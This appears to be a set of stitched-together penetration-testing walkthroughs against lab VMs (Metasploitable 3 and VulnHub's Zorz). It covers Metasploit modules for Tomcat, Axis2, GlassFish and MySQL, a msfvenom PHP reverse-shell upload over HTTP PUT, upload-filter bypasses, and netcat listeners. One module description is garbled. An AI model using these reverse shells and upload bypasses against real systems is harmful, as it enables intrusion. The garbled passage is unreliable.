Penetration Testing in Metasploitable 3 with SMB and Tomcat

Target: Metasploitable 3

Attacker: Kali Linux

Let’s begin through scanning the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.

nmap –p- -sV 192.168.1.14

From nmap result we can see port 8282 is open for apache tomcat

Open target IP on browser as 192.168.1.14:8282 Tomcat is running on port 8282, but requires credentials to access.

Now we are going to login with psexec using smb port 445

PsExec>Exec \\192.168.1.14 -u vagrant -p vagrant cmd

This command is addressing the host IP and its credential which I have access from my previous article read from here.

-u for username: vagrant

-p for password: vagrant

cmd:  to enter victim’s command prompt

As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf.

Type tomcat-users.xml

As soon as the command execute you can see I had got credential for tomcat username sploit and password sploit.  Use this credential for attack using metasploit framework in kali Linux

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for tomcat attack.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(tomcat_mgr_upload) > set rhost 192.168.1.14

msf exploit(tomcat_mgr_upload) > set rport 8282

msf exploit(tomcat_mgr_upload) > set HttpUsername sploit

msf exploit(tomcat_mgr_upload) > set HttpPassword sploit

msf exploit(tomcat_mgr_upload) > exploit

Wonderful!!! Our meterpreter session is opened and you have got victim shell.

Meterpreter> sysinfo

Another way to exploit your target

This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

msf > use exploit/multi/http/axis2_deployer

msf exploit(axis2_deployer) > set rhost 192.168.1.8

msf exploit(axis2_deployer) > set rport 8282

msf exploit(axis2_deployer) >exploit

Awesome!!!  Meterpreter session is opened again and you have got victim shell once again.

Meterpreter> sysinfo

Meterpreter> getuid

Exploitation of Metasploitable 3 using Glassfish Service

Target: Metasploitable 3

Attacker: Kali Linux

Use nmap command for scanning the target PC. NMAP will show all available open ports and their running services. Type the following command on terminal in kali Linux for aggressive scan.

nmap -p- -A 192.168.1.14

Open target IP on browser with one of unknown port 4848 as 192.168.1.14:4848

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for attack.

This module attempts to login to GlassFish instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It will also try to do an authentication bypass against older versions of GlassFish. Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.

msf > use auxiliary/scanner/http/glassfish_login

msf auxiliary(glassfish_login) > set rhosts 192.168.1.14

msf auxiliary(glassfish_login) > set rport 4848

msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true

msf auxiliary(glassfish_login) > set  user_file /root/Desktop/user.txt

msf auxiliary(glassfish_login) > set  pass_file /root/Desktop/pass.txt

msf auxiliary(glassfish_login) >exploit

After few attempt successfully we have our login for GLASSFISH as admin: sploit

Let use this credential which we have got from metasploit and try to open target IP in browser as I am using: 192.168.1.14:4848/common/index.php  

This URL gets open for administration console here it is asking for user and password login, now try to use admin: sploit as username and password respectively.

Through these credential we have breach admin console and got glassfish console and this page consist several common task.

Manual Penetration Testing in Metasploitable 3

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.

nmap –p-  192.168.1.14

As you can see it is showing multiple unknown open ports but we are not able to find running services on target IP.

Open target IP on browser with one of unknown port 8585 as 192.168.1.14:8585

Under this URL I have got directories like upload and word press lets penetrate inside it. Again type following URL on browser.

192.168.1.14:8585/uploads/

 Now we are inside the upload directory but it is showing nothing special.

Since Nmap is fail to give complete detail about open ports therefore now I will scan again the target IP using NIKTO with open port for upload directory hence type following command on terminal

Nikto –h http://192.168.1.14:8585/uploads/

It’ll scan multiple ports on a server and checks for server configuration items such as the presence of multiple index files, HTTP server options.

Here it is showing that in upload directory HTTP method PUT allows client to save files on the web server which means I can upload a file on server and this stage could became the part of attack by uploading a malicious file as backdoor in web server.

Install poster plug-in from Firefox add-on. As poster let you perform HTTP request with parameters like: GET, POST, PUT and DELETE. 

Prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4444 -f raw

Copy the code from  to die() and save it in a file with .php extension. I had save the backdoor as shel.php on desktop and will later browser this file through poster to upload on webserver.

Click on the tools from the menu bar. And then click on Poster from the drop down menu.

A following dialog box will open. Here, browse the file that you will upload and click on PUT option. This exploring will show you that PUT is allowed that means you can upload through it

It will show you that the file is uploaded and displays complete results including headers.

And you can see the same on your browser that you file will be uploaded (as in our case the file is shel.php)

Simultaneously, open metasploit and use multi/handler:

use multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.12

set lport 4444

exploit

After hitting enter button on your keyboard, run the file you just uploaded. It will give you a meterpreter session.

Hack the Zorz VM ()CTF Challenge

Zorz is another VM that will challenge your webapp skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straight forward.  This machine will probably test your web app skills once again. There are 3 different pages that should be focused on(you will see). Your goal is to successfully upload a web-shell or malicious file to the server.

This machine (zorz) does not runs on vmware. So, in case you are using your Kali Linux in vmware(for attacking), you will probably need to run Zorz on a different system in Virtual Box and of course in the same network.

You can download this machine from here: https://www.vulnhub.com/?q=zorz&sort=date-des&type=vm

Penetration Methodolgies:

§  Network Scaning (Netdiscover, Nmap)

§  Exploting Each level of File Uploading vulnbility

§  Directory brute force attack (Dirb)

§  Obtain Netcat session for each level.

Walkthrough

Let’s start with our all time favourite netdiscover to get the victim machine’s IP.

netdiscover

So, our target is located on 192.168.1.8. Let’s quickly do an nmap scan to get an idea of open ports.

nmap -A 192.168.1.129

Ok, so we have port 22 and port 80 open. Let’s visit the IP on our browser.

And it opened up like a beautiful treasure! As you can see, according this web page “contact Support” here we can attached our file and can discuss our problem.

So, here is what we did.

Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php

Open it with text editor and add listening IP and port and save this file as php-reverse-shell.jpg and start netcat at listening port.

Next we try to upload this file and our shell gets uploaded successfully.

But we have no idea as to where our file gets uploaded on the server. In order to get the location/directory of our shell, we run dirb using the dictionary /usr/share/dirb/wordlists/big.txt

dirb http://192.168.1.129 /usr/share/dirb/wordlists/big.txt

And we get to know of a directory named “uploads2”. Upon visiting this directory, we do not find our shell.php file there. Thus we try to manipulate the directory name and visit the directory”uploads1”. Click the php file to open it.

We have successfully exploited the level 1 security and we have a netcat session running right before us.

nc -lvp 1234

Now let’s go for the second level (Zorz Image Uploader 2) and try uploading the same file there.

But this time we got error, here we can upload only image with .jpg, png and GIF extension.  

Time for some more tricks. Let us open the php-reverse-shell.php file in a text editor and just before our script, add the string “GIF98” and rename the file as “php-reverse-shell.php.jpg” and try to upload it once again.

And this time It got upload successfully !!!!!!!!!!!

Time to execute the backdoor and this time the location of our file is “uploads2”. Let’s open it.

As you can observe again we got new netcat session and compromised victim’s VM successfully.

nc -lvp 1234

Now for our final task, we open the third level (Zorz Image Uploader 3) in order to upload backdoor but here clearly Note is given for the file type you will be uploading. The uploading file should be an image with .jpeg, jpg and png extension and less than 100kb.

And without any edits to our “php-reverse-shell.php” file, we try uploading it here. The file uploads successfully once again. And this time the directory it has been uploaded to is uploads3.

Let’s visit /uploads3 directory to execute the uploaded backdoor and try to obtain netcat session once again.

As you can observe again we got new netcat session and compromised victim’s VM successfully.

nc -lvp 1234

Mission accomplished. We have successfully bypassed all the three levels of security on this machine.

Hack Metasploitable 3 using Mysql Service Exploitation

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. Use nmap command for scanning the target PC. NMAP shown all available open ports and their services today this article will cover MYSQL attack for which it requires open port.

Type the following command on terminal in kali Linux.

nmap -p- -sV 192.168.0.103

 And from nmap result we can see port 3306 is open for mysql.

Let’s penetrate more inside it, use nessus for vulnerability analysis. Through nessus scanning result it shows that MYSQL account is not password protected .when you suffer more you will find that directory gets open without password. In image the output result making conclusion that root account does not have password moreover it dumps the list of database on remote server. It also gave the hint that an attack can lunch attack on database.  

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for mysql attack.

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=<5 .5.9="" a="" and="" as="" attack="" define="" directory="" dll="" enforced="" executable="" finished="" functions.="" is="" leave="" localsystem.="" module="" mysql="" not="" note:="" on="" or="" p="" payload="" permissions="" redefine="" runs="" service="" sys_eval="" sys_exec="" system="" target="" the="" this="" udf="" well="" when="" will="" write="">

msf > use exploit/windows/mysql/mysql_payload

msf exploit(mysql_payload) > set rhost 192.168.0.103

msf exploit(mysql_payload) > set rport 3306

msf exploit(mysql_payload) > exploit

Wonderful!!! Our meterpreter session is opened and you have got victim shell.

meterpreter> sysinfo